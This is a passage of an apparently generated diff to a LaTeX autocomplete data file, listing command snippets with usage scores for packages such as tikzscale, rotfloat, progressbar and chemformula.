+ }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'limap-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'limap-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'limap-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'limap-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'limap-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'limap-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'limap-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'limap-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'limap-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'limap-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'limap-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'limap-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'limap-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'limap-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'limap-cmd', + score: 
0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'limap-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'limap-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'limap-cmd', + score: 0.0313525090421608, + }, + ], + tikzscale: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzscale-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzscale-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikzscale-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikzscale-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikzscale-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzscale-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikzscale-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzscale-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikzscale-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikzscale-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzscale-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzscale-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'tikzscale-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 
'tikzscale-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'tikzscale-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'tikzscale-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tikzscale-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'tikzscale-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'tikzscale-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'tikzscale-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'tikzscale-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'tikzscale-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'tikzscale-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzscale-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'tikzscale-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'tikzscale-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'tikzscale-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzscale-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikzscale-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikzscale-cmd', + score: 0.2864294797053033, + }, + ], + savesym: [ + { + caption: '\\savesymbol{}', + snippet: '\\savesymbol{$1}', + meta: 'savesym-cmd', + score: 6.662041157021826e-5, + }, + ], + subscript: [ + { + caption: '\\textsubscript{}', + snippet: '\\textsubscript{$1}', + meta: 'subscript-cmd', + score: 0.058405875394131175, + }, + ], + letterspace: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'letterspace-cmd', + score: 0.00037306820619479756, + }, + ], + mathastext: [ + { + caption: '\\Huge', + snippet: '\\Huge', + meta: 'mathastext-cmd', + score: 0.04725806985998919, + }, + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'mathastext-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'mathastext-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'mathastext-cmd', + score: 0.021828316911576096, + }, + { + 
caption: '\\mathrm{}', + snippet: '\\mathrm{$1}', + meta: 'mathastext-cmd', + score: 0.19117752976172653, + }, + ], + movie15: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'movie15-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'movie15-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'movie15-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'movie15-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'movie15-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'movie15-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'movie15-cmd', + score: 0.0018957469739775527, + }, + ], + refstyle: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'refstyle-cmd', + score: 0.00037306820619479756, + }, + ], + 'pst-3d': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-3d-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-3d-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-3d-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-3d-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-3d-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-3d-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-3d-cmd', + score: 0.006520475264573554, + }, + ], + rotfloat: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'rotfloat-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'rotfloat-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'rotfloat-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + snippet: '\\newfloat', + meta: 'rotfloat-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'rotfloat-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'rotfloat-cmd', + score: 
0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'rotfloat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'rotfloat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'rotfloat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'rotfloat-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'rotfloat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'rotfloat-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'rotfloat-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'rotfloat-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'rotfloat-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'rotfloat-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'rotfloat-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'rotfloat-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + ], + progressbar: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'progressbar-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 
'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'progressbar-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'progressbar-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'progressbar-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'progressbar-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'progressbar-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'progressbar-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'progressbar-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'progressbar-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'progressbar-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'progressbar-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'progressbar-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 
0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'progressbar-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'progressbar-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'progressbar-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'progressbar-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'progressbar-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'progressbar-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'progressbar-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'progressbar-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'progressbar-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + ], + pagecolor: [ + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pagecolor-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pagecolor-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pagecolor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pagecolor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pagecolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pagecolor-cmd', + 
score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pagecolor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pagecolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pagecolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pagecolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pagecolor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pagecolor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pagecolor-cmd', + score: 0.021170869458413965, + }, + ], + gb4e: [ + { + caption: '\\ex', + snippet: '\\ex', + meta: 'gb4e-cmd', + score: 0.00916111174873264, + }, + ], + ESIEEcv: [ + { + caption: '\\let', + snippet: '\\let', + meta: 'ESIEEcv-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'ESIEEcv-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'ESIEEcv-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'ESIEEcv-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'ESIEEcv-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ESIEEcv-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'ESIEEcv-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'ESIEEcv-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'ESIEEcv-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ESIEEcv-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'ESIEEcv-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ESIEEcv-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'ESIEEcv-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'ESIEEcv-cmd', + score: 0.018615449342361392, + }, + ], + ftnright: [ + { + caption: '\\footnotesize', + snippet: '\\footnotesize', + meta: 'ftnright-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\footnotesize{}', + snippet: '\\footnotesize{$1}', + meta: 'ftnright-cmd', + score: 0.2038592081252624, + }, + ], + chemformula: [ + { + caption: '\\ch{}', + snippet: '\\ch{$1}', + meta: 'chemformula-cmd', + score: 0.0013276105116845872, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'chemformula-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'chemformula-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\nicefrac{}{}', + snippet: '\\nicefrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 
0.0018011350423659288, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'chemformula-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'chemformula-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'chemformula-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'chemformula-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'chemformula-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'chemformula-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'chemformula-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'chemformula-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'chemformula-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'chemformula-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'chemformula-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'chemformula-cmd', + score: 